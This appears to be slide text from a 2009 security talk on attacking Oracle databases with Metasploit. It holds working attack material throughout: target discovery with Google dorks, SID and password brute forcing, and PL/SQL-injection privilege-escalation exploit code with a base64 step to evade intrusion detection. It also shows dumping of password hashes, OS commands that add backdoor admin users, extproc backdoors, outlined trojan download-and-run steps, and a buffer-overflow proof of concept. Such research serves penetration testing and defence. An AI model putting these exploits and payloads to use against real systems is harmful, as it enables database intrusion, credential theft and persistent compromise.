  • 6. Why Oracle? Why the focus on Oracle? Some support is provided by the commercial attack frameworks, but really don’t have much coverage for non-memory corruption vulns. Other tools that target Oracle. Inguma Orasploit (not public) Pangolin (if you want to give your hard earned shell back to .cn) A few free commercial products focused on vulnerability assessment rather than exploitation.
  • 7. Current Metasploit Support Some support for Oracle is already provided. Exploit modules. Handful of memory corruption modules that target earlier versions of Oracle and some of its other applications. Auxiliary modules. Handful of modules that assist in discovering the SID, identifying the version, sql injection (file-format), post exploitation, and a ntlm stealer.
  • 8. New Metasploit Support Introduction of a TNS Mixin. Handles a basic TNS packet structure. "(CONNECT_DATA=(COMMAND=#{command}))” Used for some of our auxiliary modules. Used for our TNS exploits. Introduction of a ORACLE Mixin. Handles our direct database access. Dependencies: Oracle Instant Client. ruby-dbi. ruby-oci8. http://trac.metasploit.com/wiki/OracleUsage
  • 9. New Metasploit Support (cont.) Introduction of a ORACLE Mixin. Exposes a few methods. connect() Establishes a database handle. disconnect() Disconnect all database handles. preprare_exec() Prepares a statement then executes it.
  • 10. New Metasploit Support (cont.) Introduction of a ORACLE Mixin. Really makes things simple. msf auxiliary(sql) > set SQL "select * from global_name" SQL => select * from global_name msf auxiliary(sql) > run [*] Sending SQL... [*] ORCL.REGRESS.RDBMS.DEV.US.ORACLE.COM [*] Done... [*] Auxiliary module execution completed msf auxiliary(sql) >
  • 11. Oracle Attack Methodology We need 4 things to connect to an Oracle DB. IP. Port. Service Identifier (SID). Username/Password.
  • 12. Oracle Attack Methodology Locate Oracle Systems. Determine Oracle Version. Determine Oracle SID. Guess/Bruteforce USER/PASS. Privilege Escalation via SQL Injection. Manipulate Data/Post Exploitation. Cover Tracks.
  • 13. Oracle Attack Methodology Locate Oracle Systems Nmap. Information Disclosure Vulns. Google.
  • 14. Locate Oracle Systems Nmap. Look for common oracle ports 1521-1540,1158,5560 cg@attack:~$ nmap -sV 192.168.0.100 -p 1521 Starting Nmap 4.90RC1 ( http://nmap.org ) Interesting ports on 192.168.0.100: PORT STATE SERVICE VERSION 1521/tcp open oracle-tns Oracle TNS Listener 10.2.0.1.0 (for 32-bit Windows)
  • 15. Locate Oracle Systems Google. Google dorks to locate Oracle systems. intitle:iSQL intitle:Release inurl:isqlplus intitle:10.1 inurl:pls/portal "Index of" "Oracle-HTTP-Server" Server at Port "Last modified" 1.3.12 www.red-database-security.com/wp/google_oracle_hacking_us.pdf Yahoo dorks? to locate Oracle systems. intitle:iSQL intitle:Release inurl:isqlplus inurl:pls/portal “Oracle-HTTP-Server" Server at Port "Last modified" 1.3.12 www.red-database-security.com/wp/yahoo_oracle_hacking_us.pdf
  • 16. Locate Oracle Systems Sometimes they come pre-0wned. 
  • 17. Oracle Attack Methodology Locate a system running Oracle. Determine Oracle Version. Determine Oracle SID. Guess/Bruteforce USER/PASS. Privilege Escalation via PL/SQL Injection. Manipulate Data/Post Exploitation. Cover Tracks.
  • 18. Oracle Attack Methodology Determine Oracle Version. tns_packet(“(CONNECT_DATA=(COMMAND=VERSION))”) msf auxiliary(tnslsnr_version) > set RHOSTS 172.10.1.107-172.10.1.110 RHOSTS => 172.10.1.107-172.10.1.110 msf auxiliary(tnslsnr_version) > run [*] Host 172.10.1.107 is running: Solaris: Version 9.2.0.1.0 – Production [*] Host 172.10.1.108 is running: Linux: Version 11.1.0.6.0 - Production [*] Host 172.10.1.109 is running: 32-bit Windows: Version 10.2.0.1.0 - Production [*] Auxiliary module execution completed msf auxiliary(tnslsnr_version) > db_notes [*] Time: Fri May 29 16:09:41 -0500 2009 Note: host=172.10.1.107 type=VERSION Solaris: Version 9.2.0.1.0 – Production … [*] Time: Fri May 29 16:09:44 -0500 2009 Note: host=172.10.1.109 type=VERSION data=32- bit Windows: Version 10.2.0.1.0 - Production msf auxiliary(tnslsnr_version) >
  • 19. Oracle Attack Methodology Locate a system running Oracle. Determine Oracle Version. Determine Oracle SID. Guess/Bruteforce USER/PASS. Privilege Escalation via SQL Injection. Manipulate Data/Post Exploitation. Cover Tracks.
  • 20. Oracle Attack Methodology Determine Oracle Service Identifier (SID). tns_packet(“(CONNECT_DATA=(COMMAND=STATUS))”) By querying the TNS Listener directly, brute force for default SID's or query other components that may contain it. msf auxiliary(sid_enum) > run [*] Identified SID for 172.10.1.107: PLSExtProc [*] Identified SID for 172.10.1.107 : acms [*] Identified SERVICE_NAME for 172.10.1.107 : PLSExtProc [*] Identified SERVICE_NAME for 172.10.1.107 : acms [*] Auxiliary module execution completed msf auxiliary(sid_enum) > run [-] TNS listener protected for 172.10.1.109... [*] Auxiliary module execution completed
  • 21. Oracle Attack Methodology Determine Oracle SID. By quering the TNS Listener directly, brute force for default SID's or query other components that may contain it. msf auxiliary(sid_brute) > run [*] Starting brute force on 172.10.1.109, using sids from /home/cg/evil/msf3/dev/data/exploits/sid.txt... [*] Found SID 'ORCL' for host 172.10.1.109. [*] Auxiliary module execution completed
  • 22. Oracle Attack Methodology Determine Oracle SID. By quering the TNS Listener directly, brute force for default SID's or query other components that may contain it. msf auxiliary(sid_enum) > run [-] TNS listener protected for 172.10.1.108... [*] Auxiliary module execution completed msf auxiliary(sid_enum) > use auxiliary/scanner/oracle/spy_sid msf auxiliary(spy_sid) > run [*] Discovered SID: ‘orcl' for host 172.10.1.108 [*] Auxiliary module execution completed msf auxiliary(spy_sid) >
  • 23. Oracle Attack Methodology Determine Oracle SID. Enterprise Manger Console.
  • 24. Oracle Attack Methodology Determine Oracle SID. Enterprise Manager Console. Query other components that may contain it. msf auxiliary(sid_enum) > run [-] TNS listener protected for 172.10.1.108... [*] Auxiliary module execution completed msf auxiliary(sid_enum) > use auxiliary/scanner/oracle/oas_sid msf auxiliary(oas_sid) > run [*] Discovered SID: ‘orcl' for host 172.10.1.109 [*] Auxiliary module execution completed msf auxiliary(oas_sid) >
  • 25. Oracle Attack Methodology Locate a system running Oracle. Determine Oracle Version. Determine Oracle SID. Guess/Bruteforce USER/PASS. Privilege Escalation via SQL Injection. Manipulate Data/Post Exploitation. Cover Tracks.
  • 26. Oracle Attack Methodology Determine Oracle Username/Password. Brute Force For Known Default Accounts. msf auxiliary(login_brute) > set SID ORCL SID => ORCL msf auxiliary(login_brute) > run . [-] ORA-01017: invalid username/password; logon denied [-] ORA-01017: invalid username/password; logon denied [*] Auxiliary module execution completed msf auxiliary(login_brute) > db_notes [*] Time: Sat May 30 08:44:09 -0500 2009 Note: host=172.10.1.109 type=BRUTEFORCED_ACCOUNT data=SCOTT/TIGER
  • 27. Oracle Attack Methodology Locate a system running Oracle. Determine Oracle Version. Determine Oracle SID. Guess/Bruteforce USER/PASS. Privilege Escalation via SQL Injection. Manipulate Data/Post Exploitation. Cover Tracks.
  • 28. Oracle Attack Methodology Privilege Escalation via SQL Injection. SQL Injection in default Oracle packages. A good chunk of it executable by public!  Regular SQLI requires CREATE PROCEDURE privilege which most default accounts possess. Cursor SQLI only requires CREATE SESSION privilege.
  • 29. Privilege Escalation The code. def initialize(info = {})super(update_info(info, 'Name' => 'SQL Injection via SYS.LT.FINDRICSET.', 'Description' => %q{snip... 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision:$', 'References' =>[ [ 'BID', '26098' ],], 'DisclosureDate' => 'Oct 17 2007')) register_options( [ OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),], self.class)
  • 30. Privilege Escalation The code. name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) function = "CREATE OR REPLACE FUNCTION #{name} RETURN NUMBER AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE '#{datastore['SQL'].upcase}'; COMMIT; RETURN(0); END;"
  • 31. Privilege Escalation The code. package ="BEGIN SYS.LT.FINDRICSET('.'' #{datastore ['DBUSER']}.#{name}||'''')--',''); END;" clean = "DROP FUNCTION #{name}" .... print_status("Sending first function...") prepare_exec(function) print_status("Attempting sql injection on SYS.LT.FINDRICSET...") prepare_exec(package) print_status("Removing function '#{name}'...") prepare_exec(clean) ....
  • 32. Privilege Escalation The set-up. msf auxiliary(lt_findricset) > set RHOST 172.10.1.109 RHOST => 172.10.1.109 msf auxiliary(lt_findricset) > set RPORT 1521 RPORT => 1521 msf auxiliary(lt_findricset) > set DBUSER SCOTT DBUSER => SCOTT msf auxiliary(lt_findricset) > set DBPASS TIGER DBPASS => TIGER msf auxiliary(lt_findricset) > set SID ORCL SID => ORACLE msf auxiliary(lt_findricset) > set SQL GRANT DBA TO SCOTT SQL => GRANT DBA TO SCOTT
  • 33. Privilege Escalation Attacking SYS.LT.FINDRICSET. msf auxiliary(lt_findricset) > set SQL "grant dba to scott" SQL => grant dba to scott msf auxiliary(lt_findricset) > run [*] Sending first function... [*] Done... [*] Attempting sql injection on SYS.LT.FINDRICSET... [*] Done... [*] Removing function 'NBVFICZ'... [*] Done... [*] Auxiliary module execution completed msf auxiliary(lt_findricset) >
  • 34. Privilege Escalation Success? Before Injection. SQL => select * from user_role_privs msf auxiliary(sql) > run [*] Sending SQL... [*] SCOTT,CONNECT,NO,YES,NO [*] SCOTT,RESOURCE,NO,YES,NO After Injection. msf auxiliary(sql) > run [*] Sending SQL... [*] SCOTT,CONNECT,NO,YES,NO [*] SCOTT,DBA,NO,YES,NO [*] SCOTT,RESOURCE,NO,YES,NO
  • 36. Privilege Escalation This Can Be Solved By Implementing Some Basic Evasion. dos = Rex::Text.encode_base64(package) Which Is Then Decoded On The Remote Side. DECLARE #{rand2} VARCHAR2(32767); BEGIN #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}'))); EXECUTE IMMEDIATE #{rand2}; END;
  • 37. Privilege Escalation We Bypass The NIDS, But Not So Much The HIPS
  • 38. Privilege Escalation At least not with that exploit! "select sys.dbms_metadata.get_xml('''||#{datastore['DBUSER']}.#{name}()||''','') from dual"
  • 39. Privilege Escalation Exploits Initial Coverage. lt_findricset.rb CVE-2007-5511 lt_findricset_cursor.rb CVE-2007-5511 dbms_metadata_open.rb CVE-2006-0260 dbms_cdc_ipublish.rb CVE-2008-3996 dbms_cdc_publish.rb CVE-2008-3995 lt_rollbackworkspace.rb CVE-2009-0978 lt_compressworkspace.rb CVE-2008-3982 lt_mergeworkspace.rb CVE-2008-3983 lt_removeworkspace.rb CVE-2008-3984
  • 40. Oracle Attack Methodology Locate a system running Oracle. Determine Oracle Version. Determine Oracle SID. Guess/Bruteforce USER/PASS. Privilege Escalation via SQL Injection. Manipulate Data/Post Exploitation. Cover Tracks.
  • 41. Post Exploitation If all I want is the Data after SQLI to DBA we are probably done. sql.rb to run SQL commands. msf auxiliary(sql) > set SQL "select username,password,account_status from dba_users” SQL => select username,password,account_status from dba_users msf auxiliary(sql) > run [*] Sending SQL... [*] SYS,7087B7E95718C0CC,OPEN [*] SYSTEM,66DC0F914CDD83F3,OPEN [*] DBSNMP,E066D214D5421CCC,OPEN [*] SCOTT,F894844C34402B67,OPEN [*] Done... [*] Auxiliary module execution completed msf auxiliary(sql) >
  • 42. Post Exploitation Data is nice, but shells are better  Several published methods for running OS commands via oracle libraries. Via Java. Extproc backdoors. Dbms_Scheduler. Run custom pl/sql or java.
  • 43. Post Exploitation Win32Exec Grant user JAVASYSPRIVS using sql.rb. Run win32exec.rb to run system commands. Examples Net User Add TFTP get trojan.exe → execute trojan.exe FTP Batch Scripts Net User Add → metasploit psexec exploit  Ref: http://0xdeadbeef.info/exploits/raptor_oraexec.sql  Ref: Oracle Hacker’s Handbook
  • 44. Post Exploitation Win32Exec msf auxiliary(win32exec) > set CMD "net user dba P@ssW0rd1234 /add“ CMD => net user dba P@ssW0rd1234 /add msf auxiliary(win32exec) > run [*] Creating MSF JAVA class... [*] Done... [*] Creating MSF procedure... [*] Done... [*] Sending command: 'net user dba P@ssW0rd1234 /add‘ [*] Done... [*] Auxiliary module execution completed
  • 45. Post Exploitation nixExec To be released later.
  • 46. Post Exploitation FTP Upload Echo over FTP batch script via UTL_FILE, use DBMS_Scheduler to run the script and execute the malware. Demo Video at: http://vimeo.com/2704188  Ref: Red Database Security  Ref: http://www.red-database-security.com/wp/oracle_cheat.pdf
  • 47. Post Exploitation Perl Backdoor Oracle installs perl with every install. Use UTL_FILE to echo over perl shell line by line. Use one of the other tools to execute perl shell. Easy to use with *nix  Ref: Red Database Security
  • 48. Post Exploitation Extproc Backdoor via directory traversal.  Allows you to call libraries outside of oracle root. Nix and win32. CVE 2004-1364 9.0.1.1 – 9.0.1.5 9.2.0.1 – 9.2.0.5 10.1.0.2  Ref: http://0xdeadbeef.info/exploits/raptor_oraextproc.sql
  • 49. Post Exploitation Extproc Backdoor via directory traversal. msf auxiliary(extproc_backdoor_traversal) > set CMD “net user metasploit metasploit /add” CMD => net user metasploit metasploit /add msf auxiliary(extproc_backdoor_traversal) > run [*] Setting up extra required permissions [*] Done... [*] Set msvcrt.dll location to C:oracleora92bin../../../Windowssystem32msvcrt.dll [*] Done... [*] Setting extproc backdoor [*] Running command net user metasploit metasploit /add [*] Done… [*] Auxiliary module execution complete
  • 50. Post Exploitation Extproc Backdoor via directory traversal.
  • 51. Post Exploitation Extproc Backdoor via copy dll. “newer” versions will allow you to just copy over the dll into the %ORACLE_HOME%bin directory. CREATE OR REPLACE DIRECTORY copy_dll_from AS 'C:Windowssystem32'; CREATE OR REPLACE DIRECTORY copy_dll_to AS 'C:Oracleproduct10.1.0db_1BIN'; … CREATE OR REPLACE LIBRARY extproc_shell AS 'C:Oracleproduct10.1.0db_1binmsvcrt.dll'; / Works on newer Oracle 10g/11g.  Ref: Digital Security Research Group  Ref: http://milw0rm.org/exploits/7675
  • 52. Post Exploitation Win32upload Grant user JAVASYSPRIVS using sql.rb. Run win32upload.rb to download binary from a remote webserver Run win32exec.rb to execute the binary  Ref: Argeniss Advanced SQL Injection in Oracle Databases (Black Hat USA 2005)  Ref: http://www.argeniss.com/research/OracleSQLInjBHUSA05.zip
  • 53. Post Exploitation DBMS_Schedule Backdoor Run OS commands via DBMS_Scheduler. Module written by Alexandr Polyakov of Digital Security Research Group. Will be added to svn soon.
  • 54. Post Exploitation Oracle NTLM Stealer Oracle running as admin user not SYSTEM. Have Oracle connect back to MSF, grab halfLM challenge or perform SMB Relay attack. Module writers did a great write up on using the module and when it would be useful.  http://www.dsecrg.com/files/pub/pdf/Penetration_from_application_down_t o _OS_(Oracle%20database).pdf
  • 55. Breaking Other Oracle Apps Oracle Application Server CGI/Vulnerable URL scanner oas_cgi.rb msf auxiliary(oas_cgi) > run [*] /em/console/logon/logon [*] /em/dynamicImage/emSDK/chart/EmChartBean [*] /servlet/DMSDump [*]/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB- INF/config/soapConfig.xml [*] /servlet/Spy [*] Auxiliary module execution completed
  • 56. The Way Ahead Exploits For Vulnerable Packages. [*] ORA-03135: connection lost contact PROCEDURE DELETE_REFRESH_OPERATIONS Argument Name Type In/Out Default? ------------------------------ ----------------------- ------ -------- SNAP_OWNER VARCHAR2 IN SNAP_NAME VARCHAR2 IN sploit = rand_text_alpha_upper(576) + "BBBB" + "AAAA" + "xcc" * 500 sql = %Q|BEGIN SYS.DBMS_SNAP_INTERNAL.DELETE_REFRESH_OPERATIONS('MSF', '#{sploit}'); END; | 0:032> !exchain 074fc408: 41414141 Invalid exception stack at 42424242
  • 57. DEMO
  • 59. THANKS! HDM, Richard Evans, JMG, !LSO, Sh2kerr, Rory McCune